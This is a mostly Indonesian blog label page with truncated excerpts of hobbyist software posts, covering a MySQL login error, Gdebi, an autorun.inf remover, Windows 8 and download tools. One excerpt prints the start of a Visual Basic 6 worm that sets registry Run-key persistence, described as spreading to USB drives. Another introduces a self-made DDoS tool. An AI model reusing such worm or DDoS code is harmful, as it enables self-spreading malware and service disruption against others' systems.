Skip to main content

Posts

Showing posts with the label Software

How to Fix ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)

This Articels is about Fix Problem connecting Mysql.
Relate search : ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
Pertanyaan :  I've been install mysql in my linux operating system, but when I run, its going error. how can I fix it?
Mysql adalah salah satu DBMS yang paling banyak di gunakan, baik itu untuk lingkungan Desktop , mobile ataupun WEB, di lingkungan web database mysql adalah DBMS yang paling banyak di gunakan, Query-Query yang ada di mysql tidak semuanya berbeda, sebagian besar query yang di gunakan sama seperti DBMS yang lain. PHPmyadmin adalah aplication database yang di gunakan untuk mengatur mysql dengan GUI version.
Mysql bersifat multiplatform, jadi dapat di gunakan untuk banyak operating system dan bahasa pemrograman, pada tips and trick kali ini, saya akan membahas tentang problem yang terjadi saat kita menjalankan mysql via terminal di linux. berikut error yang muncul : 
ERROR 1045 (28000): Access denied for u…

Install Paket Debian dengan Gdebi

This tutorial is about Gdebi package. relate search : Gdebi, Debian Package, Terminal, Problem, Linux, Ubuntu, dpkg -i, *.deb , install.

Gdebi adalah software installer paket *.deb berupa GUI (Graphic User Interface),  yang di gunakan untuk menginstall paket debian secara GUI. selama ini kita ketahui, kalau ingin install paket debian menggunakan cara , mengetik perintah di Terminal " ~#dpkg -i *.deb " , hal tersebut terkadang membingungkan bagi pengguna linux pemula, karna bukan hanya harus mengetik perintah di atas, tetapi juga terlebih dahulu harus masuk ke direktori file yang mau di install. tahap-tahap tersebut sekarang dapat di persingkat dengan menggunakan software GDEBI.
Berikut tutorial cara menggunakannya :
1. Download terlebih dahulu Softwarenya di terminal :




2. Ketik "Y" dua kali. untuk menyetujui menginstall GDEBI, apabila tidak ada peringatan seperti berikut, jangan panik! persetujuan ini tidak selalu muncul.

3. Apabila sukses maka hasilnya seperti in…

Membuat Worm Sederhana dari Visual Basic 6.0

alhamdulillah, satu lagi project yang slesai malam ini. :) berikut adalah project kedua ku, yaitu Worm sederhana.

apa itu worm? google ya? :D hehe

worm ini di buat dari bahasa Basic dengan IDE visual basic 6.0 , worm ini tidak memiliki tujuan jahat. dan hanya bertujuan untuk membuatnya hidup terus dengan menggandakan dirinya ke USB dan PC.

berikut scriptnya :

'Nama       : Bill Tanthowi Jauhari 'tanggal    : 9, januari 2014 'project    : worm 'referensi  : www.google.com , ebook
Dim Nama, direktory As String 'mendapatkan direktory worm Function tempat() On Error Resume Next Dim direktory As String Nama = App.EXEName & ".exe" direktory = App.Path If Right(direktory, 1) <> "\" Then direktory = direktory & "\" End If tempat = direktory & Nama End Function 'menanam word di registry windows Function tanam() On Error Resume Next Nama = App.EXEName & ".exe" Shell ("REG ADD HKCU\software\microsoft\windows\currentversion\ru…

Membuat Software DDOS dengan VB 6.0

alhamdulillah, akhirnya liburan telah datang. project-project yang udah aku rancang waktu di sela-sela kesibukan kuliah pun akhirnya bisa di kerjakan sekarang. beberapa project udah aku kerjakan dan salah satunya sudah selesai. berikut adalah software yang telah aku slesaikan. namanya belum aku berikan :D hehehe, tapi fungsinya adalah sebagai alat untuk melakukan DDOS attack. apa itu DDOS attack atau bisa di sebut stress testing?.
In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet. As clarification, DDoS{Distributed Denial of Service} attacks are sent by two or more persons, or bots. (See botnet) DoS (Denial of Service) attacks are sent by one person or …

Kill Autorun.inf dengan AUTORUNKILLER V1.1

hallo pecinta blogger.. dan pengunjung setia diamanapuna anda berada. bagaimana kabarnya?  semoga anda baik baik saja disana, kabar baik untuk yang selalu di limbung susah karena virus autorun.inf. sudah taukan virus autorun.inf, pasti nyebelinkan?. yah, nih virus benar2 membuat pusing dengan cara penggandaanya yangselalu terdeteksi antivirus, tapi gak mau hilang2.waaahhhh. gimana itu..!!??
tapi tenang saja semua pahlawan kan datangnya terakhir, dah karna anda sudah berjuang mencari bagaimana cara menghapusnya. ini saya kasih jawabannya, yaitu KILL AUTORUN DENGAN AUTORUNKILLER V1.1 . dah software ini adalah sequel dari  AUTORUNKILLER V1.0 yang minggu kemarin sudah aku share di postingan lain. kalo mau tau bagaimana AUTORUNKILLER V1.0 klik disini. tapi bagi yang ingin versi terbarunya silahkan lihat download di postingan ini. karna yang terbaru ini lebih mudah penggunaannya dan lebih banyak virusnya. eh maksud ku fiturnya hehehehe AUTORUNKILLER V1.1 memiliki fitur sebagai berikut  1. …

Kill Autorun.inf dengan AUTORUNKILLER V1.0

AUTORUN KILLER
ASSALAMUALAIKUM WR.WB
Berikut saya akan share ke semua sahabat blogger, ini adalah software buatan saya. Yang namanya AUTORUN KILLER,  sebelum menginjak ke kelebihan dan kekurangan software ini. Saya akan memberitahu  anda tentang ciri-ciri software ini.
AUTORUN KILLER adalah software  berbasi DOS / Text . di bangun dari script batch programing dan pascal programing, dan compilernya adalah freepascal untuk pascal programing dan batch converter untuk batch script. Software ini terdiri dari 2 file,yaitu file autorunkiller.exe dan file master.exe .
Untuk kelebihan dari software ini adalah anda akan di beri kemudahan untuk memperlakukan file autorun.inf yang sering dan mayoritas di gunakan oleh virus-virus untuk penyebarannya. Nah apabila file autorun.inf sudah di eksekusi alias di kil. Otomatis file induk virus tidak akan berkutik karna file penggeraknya sudah tidak bisa bekerja. Software ini sangat ringan, yah kalau itu sudah cirikhas dari software berbas…

Windows 8 Profesional Download And Priview

hallo semua . .
baru selesai ujian akhir semester nih , jadi maaf untuk seminggu kemaren saya gak bisa share di blog. maklumlah masa belajar SKS(sistem kebut semalam) :D.
akhir semester kemaren saya mencoba beberapa eksperiment, sebetulnya bukan eksperiment. nih cuma sekedar coba-coba. saya menginstal windows 8 release priview.
waw hanya selang beberapa minggu setelah windows 8 release, sudah banyak directlink yang memberikan windows 8 baik release priview atau profesional dengan gratis. waw

dengan adanya postingan ini saya mau berbagi pengalaman mengenai windows 8 bagi yang belum ngerasain manufer dari system windows 8. menurut saya OS ini lebih cenderung ke komputer tablet,
karna applikasi dan tampilannya sangat mendukung sekali buat komputer tablet. walaupunversi PC nya ada tetapi OS ini lebih pantas kalau di taruh di komputer tablet.

untuk mengetahuinya , agar gak penasaran silahkan lihat shortcut-shortcut berikut.

1. berikut adalah shortcut dari start menu windows 8 yang menjadi…

Cara Download Cepat (MP3,Video,Image,Ebook,dll) menggunakan Add Ons Flashgot

hai semua. . .
sekarang saya mau memberikan sedikit trik yang mudah tapi sangat berguna untuk kalian yang suka download.  apakah kalian suka download?? pasti iya kan.  hehehe
apakah kalian tau Internet download manager?? pasti iya kan.! apakah kalian sering menggunakan internet download manager?? selalu. .  hehehe
nah karna Internetdownloadmanager(IDM) itu berbayar, apakah kalian bisa maksimal menggunakannya? atau apakah kalian bisa nyaman apabila selalu di bayang-banyangi hari-hari menghitung waktu mundur dalam masa trial IDM, huaha . . pasti gak enak kan?? atau kalian menggunakan crack IDM? tentu itu membantu, tetapi hal itu gak terlalu efficien, karna IDM selalu update tiap bulannya. hal itu membuat crack yang telah berhasil di versi lama tidak berguna di versi yang baru. . adduuuhh payah dah IDM.
tapi sekarang kalian bisa bernafas legah dengan adanya postingan ini, saya akan memberikan trik download yang aman, nyaman, bebas, gratis, dan ORIGINAL.

apakah kalian tau Add Ons dari mo…